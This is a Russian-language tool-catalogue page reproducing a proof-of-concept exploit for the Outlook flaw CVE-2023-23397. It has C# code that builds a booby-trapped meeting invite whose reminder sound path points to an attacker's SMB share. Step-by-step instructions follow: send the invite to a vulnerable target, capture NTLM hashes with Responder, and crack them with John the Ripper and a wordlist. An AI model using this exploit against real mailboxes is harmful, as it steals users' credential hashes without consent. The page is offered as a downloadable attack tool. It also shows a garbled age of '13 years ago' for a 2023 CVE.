Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-23397 — CVE-2023-23397 C# PoC | Kitploit
Инструменты/GitHubGitHub/moneertv/cve-2023-23397
Взлом паролейИнструменты фишингаРазведкаГенерация полезной нагрузкиАнализ уязвимостейЭксплуатация
GitHubmoneertv/cve-2023-23397

CVE-2023-23397

CVE-2023-23397 C# PoC

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-23397

CVE-2023-23397 C# PoC 1- скачайте msgkit 2- отредактируйте класс Appointment и добавьте следующее: image

3- создайте новый класс внутри проекта, чтобы задать свойства MSG-файла:

root@kitploit:~
using MsgKit.Enums;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace MsgKit
{
    class Program
    {
        static void Main(string[] args)
        {
            using (var appointment = new Appointment(
            new Sender("[email protected]", "moneertv"),
            new Representing("[email protected]", "moneertv"),
            "CVE-2023-23397"))
            {
                appointment.Recipients.AddTo("[email protected]", "muneer aqraa");
                appointment.Subject = "CVE-2023-23397";
                appointment.Location = "Neverland";
                appointment.MeetingStart = DateTime.Now.Date.AddDays(2).Date;
                appointment.MeetingEnd = DateTime.Now.Date.AddDays(3).Date;
                appointment.AllDay = true;
                appointment.BodyText = "CVE-2023-23397";
                appointment.BodyHtml = "<html><head></head><body><b>testing CVE-2023-23397</b></body></html>";
                appointment.SentOn = DateTime.UtcNow;
                appointment.Importance = MessageImportance.IMPORTANCE_NORMAL;
                appointment.IconIndex = MessageIconIndex.UnsentMail;

                appointment.PidLidReminderFileParameter = @"\\192.168.1.222\";
                appointment.PidLidReminderOverride = true;

                appointment.Save(@"C:\Users\Moneer\Desktop\exploits\CVE-2023-23397\MsgKit-master\generated email msg\dirty.msg");

            }

        }
    }
}

4- измените свойства проекта, указав тип вывода «Консольное приложение»: image

5- запустите проект, чтобы сгенерировать dirty.msg

6- отправьте сообщение уязвимой цели и дождитесь, пока активируется напоминание о встрече.

6-2- пока ждёте, на машине Kali, IP которой вы указали в главном классе, выполните следующую команду, чтобы продолжать прослушивать тех, кто попадётся на приманку: # responder -I eth0 -v

7- когда вы получите хеши, сохраните их в файл и запустите John the Ripper по этим хешам, используя словарь (например, rockyou)

Скачать инструмент